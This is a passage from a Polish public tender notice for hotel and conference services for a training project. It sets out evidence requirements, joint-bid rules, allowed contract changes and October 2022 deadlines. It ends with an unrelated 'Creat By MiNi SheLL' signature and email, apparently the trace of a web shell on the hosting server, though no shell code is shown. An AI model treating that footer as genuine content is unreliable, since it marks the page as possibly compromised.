reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone<br/>pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod<br/>przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">A. DOKUMENTY SKŁADANE WRAZ Z OFERTĄ:<br/>1. W celu potwierdzenia spełniania warunku udziału w postępowaniu Wykonawca dołącza do oferty aktualne na dzień składania ofert oświadczenie, o którym mowa w art. 125 ust. 1 Upzp dotyczące spełniania warunku udziału w postępowaniu.<br/>2. W przypadku gdy Wykonawca nie jest właścicielem lub nie posiada innego prawa własności Obiektu wskazanego w treści oferty i korzysta z potencjału podmiotu udostępniającego ten zasób – celem wykazania spełniania warunku udziału w postępowaniu, Wykonawca wraz z ofertą zobowiązany jest złożyć:<br/>a) zobowiązanie tego podmiotu, o którym mowa w Dziale XII pkt. 2 SWZ,<br/>b) oświadczenia tego podmiotu, zgodnie z pkt. 4,<br/>3. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenia, o których mowa w pkt. 1 składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Dokumenty te powinny potwierdzać spełnianie warunku udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>4. Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniem, o którym mowa w pkt. 1 także oświadczenie podmiotu udostępniającego zasoby, potwierdzające spełnianie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby.<br/>5. W celu oceny, czy Wykonawca, polegając na zdolnościach podmiotów udostępniających zasoby będzie dysponował niezbędnymi zasobami w stopniu umożliwiającym należyte wykonanie zamówienia publicznego oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, Zamawiający żąda dołączenia do oferty dokumentów, o których mowa w SWZ w Dziale XII pkt. 2 ppkt 1-3 SWZ.<br/>B. DOKUMENTY SKŁADANE PO OTWARCIU OFERT:<br/>1. Zamawiający przed wyborem najkorzystniejszej oferty wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia podmiotowych środków dowodowych potwierdzających:<br/>1) spełnianie przez Wykonawcę warunku udziału w postępowaniu dotyczącego zdolności zawodowej (o którym mowa w SWZ w Dziale X pkt. 2 ppkt. 2.2.):<br/>a) wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy;</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1. Zamawiający wymaga od Wykonawców przedłożenia wraz z ofertą następujących przedmiotowych środków dowodowych:<br/>a) Przygotowaną przez siebie w dowolnej formie zbiorczą Informację o dysponowanym Obiekcie, w której Wykonawca przedstawi ofertę Obiektu<br/>w odniesieniu co najmniej do:<br/>- ilości i standardu dostępnych pokoi i ich wyposażenia (patrz SWZ Dział III pkt. 4.3.),<br/>- ilości i standardu dostępnych sal konferencyjnych/szkoleniowych i ich wyposażenia (patrz SWZ Dział III pkt. 4.7.)<br/>- dostępności Obiektu w formie wstępnego Harmonogramu (patrz SWZ Dział III pkt. 3.2. i ppkt. 3.2.1.),<br/>b) Zobowiązanie właściciela lub zarządcy Obiektu wskazanego przez Wykonawcę (do realizacji przedmiotowej usługi) o oddaniu tej nieruchomości na potrzeby świadczenia usługi przez Wykonawcę – chyba, że Wykonawca posiada odpowiedni tytuł prawny do tej nieruchomości (w zakresie gwarantującym prawo do dysponowania nią w zakresie obejmującym złożenie<br/>oferty i świadczenie przedmiotowej usługi)<br/>2. W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień dotyczących przedmiotowych środków dowodowych. Zamawiający pozostawia sobie także prawo do przeprowadzenia oględzin Obiektu wskazanego przez Wykonawcę celem potwierdzenia złożonych oświadczeń lub/i złożonych dokumentów lub przedmiotowych środków dowodowych.<br/>3. Zamawiający nie przewiduje możliwości złożenia dokumentu o którym mowa w pkt. 1 lit. a) po upływie terminie składania ofert lub wezwania Wykonawcy do jego uzupełnienia w przypadku złożenia dokumentu niekompletnego.<br/>4. W przypadku, gdy Wykonawca nie złoży wraz z ofertą dokumentu o którym mowa pkt. 1 lit. a) lub złoży dokument niekompletny, oferta Wykonawca zostanie odrzucona na podstawie art. 226 ust. 1 pkt 5 Upzp. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> W określonych przypadkach tego wymagających, Wykonawca wraz z ofertą składa także:<br/>1) pełnomocnictwo, jeżeli Wykonawca samodzielnie składający ofertę jest reprezentowany przez pełnomocnika;<br/>a) Gdy umocowanie osoby składającej ofertę nie wynika z dokumentów rejestrowych, wykonawca, który składa ofertę za pośrednictwem pełnomocnika, powinien dołączyć do oferty dokument pełnomocnictwa obejmujący swym zakresem umocowanie do złożenia oferty lub do złożenia oferty i podpisania umowy.<br/>b) W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia wykonawcy zobowiązani są do ustanowienia pełnomocnika. Dokument pełnomocnictwa, z treści którego będzie wynikało umocowanie do reprezentowania w postępowaniu o udzielenie zamówienia tych wykonawców należy załączyć do oferty.<br/>c) Pełnomocnictwo powinno być załączone do oferty i powinno zawierać<br/>w szczególności wskazanie:<br/>- postępowania o zamówienie publiczne, którego dotyczy,<br/>- wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby,<br/>- ustanowionego pełnomocnika oraz zakresu jego umocowania.<br/>d) Jeżeli pełnomocnictwo zostało wystawione jako dokument elektroniczny, przekazuje się ten dokument. W przypadku, gdy Wykonawca będzie dysponował jedynie pełnomocnictwem w formie papierowej, przekazuje cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym,<br/>poświadczające zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej.<br/>e) Wyżej wymienionego poświadczenia zgodności cyfrowego odwzorowania<br/>z dokumentem w postaci papierowej, o którym mowa w lit. d), w przypadku dokumentów potwierdzających umocowanie do reprezentowania dokonuje odpowiednio Wykonawca, Wykonawca wspólnie ubiegający się o udzielenie zamówienia, podmiot udostępniający zasoby lub podwykonawca, w zakresie, który każdego z nich dotyczy.<br/>f) Poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej, może dokonać również notariusz.<br/>2. Składając ofertę i kalkulując jej cenę, Wykonawca zobowiązany jest przyjąć obowiązującą stawkę podatku VAT w odniesieniu do przedmiotu danego rodzaju świadczenia będącego częścią przedmiotowej usługi,<br/>2.1 W przypadku zastosowania przez Wykonawcę nienaliczenia podatku VAT Wykonawca zobowiązany jest złożyć wraz z ofertą oświadczenie lub inne dokumenty potwierdzające podstawę prawną do podjęcia takiego działania. W sytuacji, gdy Wykonawca nie złoży oświadczenia o którym mowa w zdaniu poprzednim i na wezwanie Zamawiającego Wykonawca nie złoży wyjaśnień lub złoży wyjaśnienia nieprzekonywujące, wówczas Zamawiający uprawniony będzie do odrzucenia oferty na podstawie art. 226 pkt. 1 ppkt 10) Upzp. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (możliwość składania jednej oferty przez dwa lub więcej podmiotów np. konsorcjum firm, spółkę cywilną), pod warunkiem, że taka oferta będzie spełniać następujące wymagania:<br/>1) Wykonawcy wspólnie ubiegający się o zamówienie muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego;<br/>2) Wykonawcy wspólnie ubiegający się o zamówienie przedłożą wraz z ofertą stosowny dokument (pełnomocnictwo) potwierdzający umocowanie pełnomocnika, o którym mowa w pkt 1;<br/>3) oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie (przez każdego z Wykonawców lub pełnomocnika);<br/>4) korespondencja będzie prowadzona wyłącznie z Wykonawcą występującym jako Pełnomocnik pozostałych.<br/>2. Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy. Wykonawca, który zamierza powierzyć wykonanie części zamówienia podwykonawcy, musi wyraźnie wskazać w formularzu oferty, jaką część/zakres zamówienia będzie wykonywać podwykonawca oraz podać nazwę ewentualnych podwykonawców, jeżeli są już znani. W przypadku,<br/>gdy Wykonawca nie zamierza wykonywać zamówienia przy udziale podwykonawców, należy wpisać „nie dotyczy” lub inne podobne sformułowanie. Jeżeli Wykonawca pozostawi ten punkt formularza ofertowego nie wypełniony (puste pole), Zamawiający uzna, iż zamówienie zostanie wykonane bez udziału podwykonawców.<br/>3. Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 118 ust. 1 Upzp, w celu wykazania spełniania warunku udziału w postępowaniu, Wykonawca jest obowiązany wykazać Zamawiającemu, że proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia go<br/>w stopniu nie mniejszym niż podwykonawca, na którego zasoby Wykonawca powoływał się w trakcie postępowania o udzielenie zamówienia.<br/>4. W przypadku wyboru oferty Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający, przed zawarciem umowy, zażąda umowy regulującej współpracę tych Wykonawców.<br/>5. W przypadku Wykonawców wspólnie ubiegających się o zamówienie, w celu spełnienia warunku udziału w postępowaniu dotyczącego zdolności zawodowej, Wykonawcy mogą polegać na zdolnościach tych z Wykonawców, którzy wykonują usługi, do realizacji których te zdolności są wymagane. W takim przypadku Wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia dołączają do oferty oświadczenie, stanowiące załącznik nr 3 do SWZ, z którego wynika, które usługi wykonają poszczególni Wykonawcy.<br/>6. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców,<br/>oświadczenia o spełnianiu warunków udziału w postępowaniu oraz oświadczenie o braku podstaw do wykluczenia z udziału w postępowaniu, składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Dokumenty te powinny potwierdzać spełnianie warunku udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z<br/>Wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem warunków ich wprowadzenia:<br/>a) w przypadku zmiany przepisów prawa w zakresie dotyczącym stawki podatku VAT<br/>b) w przypadku wystąpienia okoliczności związane z COVID – 19, w szczególności nakazy, zakazy o zasięgu krajowym lub obowiązujące w miejscu przeprowadzenia Szkolenia nałożone przez właściwe organy w szczególności organy władzy publicznej, właściwe jednostki sanitarne uniemożliwią przeprowadzenie realizacji usługi w sposób i w terminie określonym w<br/>niniejszej umowie - zmiana może polegać na modyfikacji sposobu realizacji umowy, terminu realizacji umowy poprzez jego wydłużenie. Zapisy zawarte w SWZ poz. Dział VIII pkt. 2 ppkt. 2.1. stosuje się odpowiednio.<br/>c) w przypadku zmiany sposobu rozliczania umowy lub dokonywania płatności na rzecz Wykonawcy - np. na skutek zmian we wniosku o dofinansowanie Projektu lub zmian Wytycznych dotyczących realizacji projektu;<br/>d) w przypadku zmiany terminu realizacji Przedmiotu Umowy, np.: na skutek zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu; ze względu na uchybienia terminowe bądź zmiany terminów - z innych niż zawinione powodów - czasu realizacji innych zamówień, od których realizacja Przedmiotu umowy jest zależna;<br/>e) w przypadku wystąpienia siły wyższej - jako „siły wyższe&#34; uznaje się klęski żywiołowe, huragan, powódź, katastrofy transportowe, pożar, eksplozje, pandemia, wojna i inne nadzwyczajne wydarzenia, których zaistnienie leży poza zasięgiem i kontrolą układających się stron („siła wyższa&#34; - to zdarzenie (a) zewnętrzne, (b) niemożliwe lub prawie niemożliwe do przewidzenia, (c) którego skutkom nie można zapobiec); wystąpienie siły wyższej może być podstawą zmian postanowień zawartej umowy np. w zakresie terminu realizacji Przedmiotu Umowy;<br/>2. Ponadto, Zamawiający przewiduje możliwość wprowadzenia zmian do umowy w zakresie terminu jej wykonania o którym mowa w § 5 pkt. 1 Projektu umowy, w przypadku wystąpienia opóźnień po stronie Zamawiającego, które uniemożliwiają Wykonawcy realizację przedmiotu umowy w tym terminie,<br/>3. Zamawiający może wyrazić zgodę na zmianę umowy poprzez wprowadzenie zmiany w lokalizacji Obiektu w którym odbywa się świadczenie przedmiotowej usługi. Zmiana wskazanej w ofercie może nastąpić najpóźniej na 5 dni roboczych przed terminem rozpoczęcia szkolenia. Wprowadzenie powyższej zmiany wymaga spełnienia łącznie następujących warunków:<br/>a) zapewnienia lokalizacji spełniającej wymogi Zamawiającego, określone w SWZ oraz zgodnej ze złożoną ofertą;<br/>b) uzyskania przez Wykonawcę pisemnej zgody Zamawiającego na zaproponowaną zmianę lokalizacji.<br/>3.1. W szczególnie uzasadnionych przypadkach, zwłaszcza gdy wystąpią okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, dopuszczalna jest zmiana lokalizacji wskazanej przez Wykonawcę w ofercie także w terminie późniejszym, po uzyskaniu pisemnej zgody Zamawiającego. Niezbędnym jest, aby zaproponowana przez Wykonawcę lokalizacja spełniała wymogi Zamawiającego, określone w szczegółowym opisie przedmiotu zamówienia i ofercie Wykonawcy.<br/>4. Zmiany postanowień zawartej umowy wymagają dla swej ważności formy pisemnej w postaci aneksu, pod rygorem nieważności, podpisanego przez obie strony. Sporządzenie aneksu będzie poprzedzone podpisaniem protokołu<br/>wskazującego okoliczności uzasadniające zmianę umowy.<br/>5. Zmiany umowy dotyczące terminu realizacji, powodujące i skutkujące wydłużeniem terminu realizacji Przedmiotu Umowy (wykonania Umowy) w zakresie czasowym wykraczającym poza ramy realizacji Projektu, będą możliwe jedynie w przypadku, gdy Zamawiający uzyska zgodę na wydłużenie terminu realizacji Projektu. Zmiany terminu realizacji Przedmiotu Umowy nie mają wypływu na wysokość wynagrodzenia Wykonawcy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-10-19 14:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę w formie elektronicznej lub postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym należy złożyć za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na ePUAP i udostępnionego również na miniPortalu MiniPortal https://miniportal.uzp.gov.pl/.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-10-19 14:45</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-11-17</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	Zamawiający ustala następujące terminy realizacji zamówienia: od 28.10.2022 r. – 31.08.2023 r., <br/>1.1. Zamawiający informuje, że dopuszcza się sytuację w której świadczenie usługi rozpocznie się przed początkowym terminem o którym mowa w pkt. 1 pod warunkiem że:<br/>a) sytuacja ta wynika z przebiegu postępowania przetargowego,<br/>b) Wykonawca wyrazi pisemną gotowość przystąpienia do realizacji usługi <br/>w pełnym zakresie w terminie zaproponowanym przez Zamawiającego.

Creat By MiNi SheLL
Email: jattceo@gmail.com